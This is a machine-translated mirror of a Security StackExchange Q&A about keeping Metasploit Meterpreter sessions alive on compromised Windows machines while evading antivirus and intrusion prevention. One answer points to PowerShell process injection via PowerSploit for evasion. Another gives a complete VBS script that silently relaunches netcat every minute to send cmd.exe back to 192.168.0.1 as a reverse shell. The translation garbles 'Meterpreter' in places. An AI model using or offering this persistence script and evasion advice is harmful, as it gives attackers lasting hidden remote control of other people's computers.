Metasploit Meterpreter持久性脚本替代方案
Metasploit Meterpreter持久性脚本替代方案
提问于 2016-08-03 09:12:49
这些天来,我正在测试各种类型的客户端黑客技术,在所有场景中,我都使用Meterpreter/reverse_tcp作为有效负载。现在,我可以轻松地绕过反病毒和防火墙,但是当我运行持久性模块时,反病毒和IPS总是检测用于持久性的Meterpreter有效负载,并且它们删除文件时也会遇到与meterpreter bypass_UAC脚本相同的问题。
如您所知,计量器会话总是因为各种原因而很容易死亡,如internet连接断开或重新启动系统等。
有没有比Meterpreter持久化脚本更好的方法来持久性我的会话并绕过反病毒和防火墙?
是否有任何方法使计量器持久性脚本使用我自己编制的有效载荷,而不是自动生成的metasploit有效载荷,而这些负载很容易被杀毒病毒捕获?
回答 2
Security用户
发布于 2016-08-03 14:40:22
我猜你说的是Windows作为目标系统。在这种情况下,对于大多数现代的Windows,您应该考虑将powershell和向正在运行的进程注入计量器有效负载。通常会绕过防病毒。在powersploit框架中有很多有用的脚本。看看这个博客中的几个例子,您在实践中必须做些什么。
Security用户
发布于 2016-11-26 20:35:22
除非你喜欢一些极端危险的工作,否则也许可以参考阿特雷的答案。但每次你只需要重新启动ncat的计价器就够了。
在vbs中使用ncat / netcat持久性:
Dim ncShell
Set ncShell = WScript.CreateObject("WScript.shell")
Do while True:
ncShell.Run "powershell.exe C:\windows\nc.exe 192.168.0.1 -e cmd.exe", 0, true
WScript.Sleep(60000)
Loop页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://security.stackexchange.com/questions/131789
复制相关文章
相似问题
腾讯云开发者
